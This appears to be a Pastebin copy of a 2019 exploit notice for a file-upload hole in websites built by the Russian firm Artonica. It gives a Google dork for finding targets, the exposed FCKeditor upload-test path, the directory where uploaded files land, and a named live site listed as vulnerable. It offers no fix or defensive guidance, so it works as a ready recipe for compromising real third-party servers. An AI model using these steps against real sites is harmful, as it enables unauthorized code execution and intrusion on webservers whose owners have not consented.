Advertisement
KingSkrupellos

Artonica Russia Unauthorized File Insertion

May 21st, 2019
173
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.13 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Artonica Russia Unauthorized File Insertion
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 21/05/2019
  7. # Vendor Homepage : artonica.ru
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : Artonica site:ru
  12. # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  16.  
  17. ####################################################################
  18.  
  19. # Description About Software :
  20. *****************************
  21. Artonica is a Web Design and Development Company in Russia.
  22.  
  23. ####################################################################
  24.  
  25. # Impact :
  26. ***********
  27. Artonica is prone to a vulnerability that lets attackers
  28. upload arbitrary files because it fails to adequately sanitize user-supplied input.
  29.  
  30. An attacker can exploit this vulnerability to upload arbitrary code and execute
  31. it in the context of the webserver process. This may facilitate unauthorized access
  32. or privilege escalation; other attacks are also possible.
  33.  
  34. ####################################################################
  35.  
  36. # Arbitrary File Upload / Unauthorized File Insert Exploit :
  37. **************************************************
  38. /common/admin/vendor/fckeditor/editor/filemanager/connectors/uploadtest.html
  39.  
  40. Select the "File Uploader" to use: Resource Type : PHP
  41.  
  42. Directory File Path :
  43. ******************
  44. /common/upload/[YOURFILENAME].txt .jpg .gif .png
  45.  
  46. ####################################################################
  47.  
  48. # Example Vulnerable Sites :
  49. ************************
  50. [+] afrocom.ru/common/admin/vendor/fckeditor/editor/filemanager/connectors/uploadtest.html
  51.  
  52. ####################################################################
  53.  
  54. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  55.  
  56. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement